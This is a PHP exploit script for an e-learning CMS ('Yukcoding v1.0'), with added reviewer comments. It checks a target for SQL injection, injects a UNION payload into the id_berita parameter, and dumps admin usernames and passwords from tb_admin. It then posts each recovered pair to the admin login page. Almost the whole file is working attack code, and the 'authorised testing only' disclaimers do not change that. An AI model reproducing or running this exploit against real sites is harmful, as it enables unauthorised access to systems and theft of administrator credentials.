<?php
/**
 * SQL-injection proof of concept for "CMS E-Learning Yukcoding v1.0".
 *
 * @author Z0NK3X ft R3VO
 * @package Exploit CMS E-Learning Yukcoding
 * Payload by R3VO
 * SQLi CMS E-Learning Yukcoding v1.0
 *
 * NOTE(review): this script injects a UNION query into the id_berita
 * parameter, prints whatever it recovers from tb_admin, and then POSTs
 * those credentials to the target's admin login. Use it only against
 * systems you are explicitly authorised to test.
 */
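/**
 * Return the text between the first occurrence of $start and the next
 * occurrence of $end in $string.
 *
 * @param string $string haystack to search
 * @param string $start  opening delimiter (callers always pass a non-empty one)
 * @param string $end    closing delimiter (non-empty)
 * @return string the substring; "" when $start is absent; the whole
 *                remainder after $start when $end is absent. The original
 *                explode()-based version produced the same values but
 *                emitted an "Undefined array key 1" warning (and a null
 *                deprecation on PHP 8.1+) whenever $start was missing.
 */
function getstr($string, $start, $end){
    $string = (string) $string;
    $openAt = strpos($string, $start);
    if ($openAt === false) {
        // No opening delimiter: explode() yielded a single element, so the
        // original fell through to "" — keep that result, minus the warning.
        return "";
    }
    $rest = substr($string, $openAt + strlen($start));
    $closeAt = strpos($rest, $end);
    // No closing delimiter: explode() returned the whole remainder as [0].
    return $closeAt === false ? $rest : substr($rest, 0, $closeAt);
}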
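/**
 * Probe whether $url answers an HTTP HEAD request.
 *
 * @param string $url absolute http:// or https:// URL typed by the operator
 * @return bool true when curl received any response at all (a 4xx/5xx still
 *              counts — this tests reachability, not success); false for a
 *              malformed URL, a non-HTTP(S) scheme, or no response
 */
function check_connection($url){
    if(!filter_var($url, FILTER_VALIDATE_URL))
    {
        return false;
    }
    // FILTER_VALIDATE_URL accepts any scheme (ftp://, file://, gopher://...),
    // and curl would fetch them. The script only makes sense over HTTP(S)
    // (it says so on the prompt), so reject everything else up front.
    $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
    if ($scheme !== 'http' && $scheme !== 'https') {
        return false;
    }
    //initialize curl
    $curlInit = curl_init($url);
    curl_setopt($curlInit,CURLOPT_CONNECTTIMEOUT,10);
    // CONNECTTIMEOUT only bounds the TCP/TLS handshake; without a total
    // timeout a server that accepts and then stalls hangs the probe forever.
    curl_setopt($curlInit,CURLOPT_TIMEOUT,20);
    curl_setopt($curlInit,CURLOPT_HEADER,true);
    curl_setopt($curlInit,CURLOPT_NOBODY,true);
    curl_setopt($curlInit,CURLOPT_RETURNTRANSFER,true);
    //get answer
    $response = curl_exec($curlInit);
    curl_close($curlInit);
    // TLS verification is left ON here (unlike curl()/post_data() below),
    // which is the right default for an operator-typed URL.
    if ($response) return true;
    return false;
}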
/**
 * Heuristic SQLi check: appends a single quote to $url and looks for the
 * MySQL syntax-error banner in the response body.
 *
 * @param string $url target URL; the quote is appended verbatim (not encoded)
 * @return bool true when the error text appears (case-insensitive), false
 *              otherwise — including when the fetch fails and returns false
 */
function detect_sqli($url){
    $marker = 'You have an error in your SQL syntax; check the manual that corresponds to your';
    $body = file_get_contents($url."'");
    // A case-insensitive literal search is equivalent to the original /i
    // regex: the marker contains no PCRE metacharacters.
    return stripos((string) $body, $marker) !== false;
}
/**
 * Fetch $url and cut out the credential dump between the " <li>," marker
 * and the following " </div>" (the shape the injected make_set() payload
 * in exploit_sqli produces).
 *
 * @param string $url injected URL to fetch with file_get_contents()
 * @return string raw marker-delimited run, "" when the marker is absent
 */
function get_upw($url){
    $openMarker  = " <li>,";
    $closeMarker = " </div>";
    $html = file_get_contents($url);
    return getstr($html, $openMarker, $closeMarker);
}
/**
 * GET $url and return its raw response headers plus the first cookie
 * the server set (value of Set-Cookie up to the first ';').
 *
 * @param string $url URL to fetch (redirects are followed)
 * @return array{header:string,cookie:string}
 *
 * NOTE(review): CURLOPT_SSL_VERIFYPEER is disabled, so on an https target
 * the operator's own traffic — including the session cookie and, via
 * post_data(), the recovered credentials — can be intercepted by any
 * on-path party. Accept-Encoding advertises gzip/deflate/br but
 * CURLOPT_ENCODING is never set, so curl does not decode a compressed
 * body; only $header is used here, so this function is unaffected.
 */
function curl($url){
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // see NOTE(review) above
    curl_setopt($ch, CURLOPT_HEADER, 1);
    curl_setopt($ch, CURLOPT_HTTPHEADER, array(
        'accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
        'accept-encoding: gzip, deflate, br',
        'accept-language: en-US,en;q=0.9,id;q=0.8',
        'cache-control: max-age=0',
        'Cookie:',
        'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.62 Safari/537.36'
    ));
    $res = curl_exec($ch);
    // Split headers from body using curl's own header size; $body is
    // computed but not returned or used.
    $header = substr($res, 0, curl_getinfo($ch, CURLINFO_HEADER_SIZE));
    $body = substr($res, curl_getinfo($ch, CURLINFO_HEADER_SIZE));
    curl_close($ch);
    // getstr() emits an undefined-key warning and yields "" when the
    // response carries no Set-Cookie header.
    $cookie = getstr($header, "Set-Cookie: ",";");
    return ["header" => $header,"cookie" => $cookie];
}
/**
 * POST $param (a pre-built x-www-form-urlencoded string) to $url and return
 * the response body. A plain GET to the same URL is issued first, via
 * curl(), purely to obtain a session cookie that is replayed on the POST.
 *
 * @param string $url   endpoint (exploit_sqli passes .../admin/inc/proses_login.php)
 * @param string $param form body, already encoded by the caller
 * @return string|false response body, or false when curl_exec() fails
 *
 * NOTE(review): TLS verification (host and peer) is disabled here as well.
 * The handle is never curl_close()d. The caller compares the returned body
 * to "sukses" with ==; the gzip/deflate Accept-Encoding header is sent
 * without CURLOPT_ENCODING, so a compressed response would not match.
 */
function post_data($url, $param){
    $curl = curl($url);
    $c = curl_init();
    curl_setopt($c, CURLOPT_URL, $url);
    curl_setopt($c, CURLOPT_USERAGENT, "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.62 Safari/537.36");
    curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 0); // see NOTE(review) above
    curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0);
    curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($c, CURLOPT_HTTPHEADER, array(
        'Accept: */*',
        'Accept-Encoding: gzip, deflate',
        'Accept-Language: en-US,en;q=0.9,id;q=0.8',
        'Connection: keep-alive',
        'Content-Type: application/x-www-form-urlencoded; charset=UTF-8',
        'Cookie: '.$curl["cookie"],
        'X-Requested-With: XMLHttpRequest'
    ));
    curl_setopt($c, CURLOPT_POSTFIELDS,$param);
    curl_setopt($c, CURLOPT_POST, 1);
    $out = curl_exec($c);
    return $out;
}
/**
 * Run the full chain against one URL: error-based detection, a UNION
 * injection through the id_berita parameter, printing of whatever comes
 * back, then a login attempt with each recovered username/password pair.
 *
 * @param string $url target URL containing an id_berita=<value> parameter
 * @return void output only; exits the process when the injected page does
 *              not contain the "<li>," marker
 *
 * NOTE(review): every step here assumes the CMS's fixed layout (a tb_admin
 * table with username/pass columns, an <h3 align="center"> that echoes the
 * injected column, admin/inc/proses_login.php answering "sukses"). The
 * recovered passwords are printed and re-sent over the (unverified-TLS)
 * client in curl()/post_data(); treat the console output as sensitive.
 */
function exploit_sqli($url){
    // ANSI colours; $blue and $yellow are defined but never used below.
    $green = "\e[1;92m";
    $cyan = "\e[1;36m";
    $putih = "\e[0m";
    $blue = "\e[34m";
    $green1 = "\e[0;92m";
    $yellow = "\e[93m";
    $red = "\e[1;91m";
    if (detect_sqli($url)) {
        echo "[+] Target is ".$green1."Vulnerable!\n".$putih;
        // UNION payload: column 2 carries @@version, column 3 a make_set()
        // walk over tb_admin that concatenates "<li>", username and pass
        // for every row into one string.
        $payload = "%27%20+UNION+ALL+SELECT+1,@@version,make_set(6,@:=0x0a,(select(1)from(tb_admin)where@:=make_set(511,@,0x3c6c693e,username,pass)),@),4,5,6--+";
        // Pull the id value out of the URL (the "<" is a sentinel so getstr
        // finds an end delimiter even when id_berita is the last parameter).
        $id = getstr($url."<", "id_berita=","<");
        // Negates the id so the original row is empty and the UNION rows
        // show. str_replace() rewrites EVERY occurrence of $id in the URL,
        // not only the id_berita value — a URL whose other parameters
        // contain the same digits is corrupted.
        $exp = str_replace($id, "-".$id.$payload, $url);
        $get = file_get_contents($exp);
        if (!preg_match('/<li>,/i', $get)) {
            echo "[-] Can't Get Database, maybe not vulnerable\n";
            exit();
        }
        // The page echoes the injected second column inside <h3 align="center">.
        $dsqli = getstr($get, '<h3 align="center">','</h3>');
        echo "[+] VersionDB : ".$dsqli."\n";
        // Turn ",<li>," into a row separator and "," into a user|pass
        // separator. A username or password that itself contains "," or
        // "|" breaks this split.
        $pecah = str_replace([",<li>,",","],["\n","|"],get_upw($exp));
        $x = 1;
        echo "+--------------------------------+\n";
        foreach (explode("\n", $pecah) as $up) {
            // $pch[1] is undefined (warning, null) for a row without "|".
            $pch = explode("|", $up);
            echo "[+] Data User & Pass [".$x++."]\n";
            echo "+--------------------------------+\n";
            echo "[+] Username : ".$cyan.$pch[0].$putih."\n";
            echo "[+] Passowrd : ".$cyan.$pch[1].$putih."\n";
            echo "+--------------------------------+\n";
            // Admin URL is <scheme>://<host><path>admin/ — this assumes the
            // target's path ends with "/" (e.g. ".../e-Learning/").
            $urp = parse_url($url);
            $adlo = $urp["scheme"]."://".$urp["host"].$urp["path"]."admin/";
            echo "[?] Trying Login\n";
            sleep(1);
            echo "[*] Posting Data to ".$adlo."inc/proses_login.php\n";
            sleep(1);
            // Only spaces are stripped; the values are not urlencoded, so a
            // password containing "&" or "=" is sent as a broken form body.
            echo "[*] Form Data : ".str_replace(" ", "","user=".$pch[0]."&pass=".$pch[1])."\n";
            sleep(1);
            if(post_data($adlo."inc/proses_login.php", str_replace(" ", "","user=".$pch[0]."&pass=".$pch[1])) == "sukses"){
                echo "[*] Getting Response\n";
                sleep(2);
                echo $green1."[+] Login Success!\n".$putih;
            }else{
                echo "[*] Getting Response\n";
                echo $red."[-] Login Failed!\n".$putih;
            }
        }
        echo "+--------------------------------+\n";
    }
    else{
        echo "[-] Target isn't ".$red."Vulnerable!\n".$putih;
    }
}
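/**** TARGET ****/
# Expected URL shape — the script rewrites the id_berita value (see exploit_sqli):
#   http://<host>/e-Learning/?hal=daftar&page=berita&action=detail&id_berita=7
# Only run this against systems you are explicitly authorised to test.
echo "[!] USE PROTOCOL! [HTTP/HTTPS]\n";
$url = readline("[*] URL TARGET : ");
// readline() returns false on EOF (Ctrl-D); the original fed that straight
// into parse_url() and the probe and only failed with warnings. Bail cleanly.
if ($url === false || trim($url) === "") {
    echo "[-] No URL given\n";
    exit(1);
}
$url = trim($url);
$urp = parse_url($url);
// parse_url() omits keys it cannot find; default them so a bare URL does not
// raise undefined-index warnings while building the admin URL (the value
// itself is the same as before: "<scheme>://<host><path>admin/").
$adlo = ($urp["scheme"] ?? "")."://".($urp["host"] ?? "").($urp["path"] ?? "")."admin/";
echo "[+] Connecting to Target\n";
if (check_connection($url)) {
    echo "[?] Starting Exploit\n";
    // exploit_sqli() prints everything itself and returns nothing; the
    // original's `."\n"` concatenation on this call was a no-op.
    exploit_sqli($url);
    echo "[+] Admin Login\n[*] $adlo\n";
    echo "+------------[ FINISH ]----------+\n";
}else{
    echo "[-] Couldn't Connect to Target!\n";
    echo "[?] Please to check your connection\n";
    exit();
}
// No closing ?> tag: this file is PHP-only, and a stray newline after the
// tag would be emitted as output.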